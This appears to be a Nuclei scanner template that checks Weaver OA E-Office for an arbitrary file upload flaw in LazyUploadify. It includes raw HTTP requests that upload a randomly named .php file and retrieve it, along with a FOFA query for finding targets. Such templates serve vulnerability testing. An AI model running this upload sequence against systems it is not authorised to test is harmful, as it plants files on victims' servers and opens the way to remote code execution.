id: weaver-lazyuploadify-file-upload info: name: OA E-Office LazyUploadify - Arbitrary File Upload author: SleepingBag945 severity: critical description: OA E-Office LazyUploadify is vulnerable to arbitrary file upload. reference: - https://github.com/w-digital-scanner/w9scan/blob/master/plugins/weaver_oa/2158.py metadata: verified: true max-request: 3 fofa-query: app="泛微-EOffice" tags: weaver,e-office,intrusive,rce,file-upload variables: filename: "{{to_lower(rand_base(5))}}" string: "{{randstr}}" http: - raw: - | GET /general/weibo/javascript/LazyUploadify/uploadify.php HTTP/1.1 Host: {{Hostname}} - | POST /general/weibo/javascript/LazyUploadify/uploadify.php HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 Accept: */* Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryjetvpuye Accept-Encoding: gzip ------WebKitFormBoundaryjetvpuye Content-Disposition: form-data; name="Filedata"; filename="{{filename}}.php" Content-Type: application/octet-stream ------WebKitFormBoundaryjetvpuye-- - | GET /attachment/{{attachmentID}}/{{attachmentName}} HTTP/1.1 Host: {{Hostname}} extractors: - type: regex name: attachmentID internal: true group: 1 regex: - "attachmentID\":(.*?)," - type: regex name: attachmentName internal: true group: 1 regex: - "attachmentName\":\"(.*?)\"," matchers-condition: and matchers: - type: dsl dsl: - "status_code_1 == 200" - "contains(body_2, 'attachmentID') && contains(body_2, 'attachmentName')" - "status_code_3 == 200 && contains(body_3,'{{randstr}}')" condition: and # digest: 4b0a00483046022100b1ecbee09f268b25db456fc80be7fb4e0436700a30c52c333959bad8e6396eaa022100ecdc3c2a0b7b463361a617fa59de8766cc175aa00c02f53aab647db22bf0b837:922c64590222798bb761d5b6d8e72950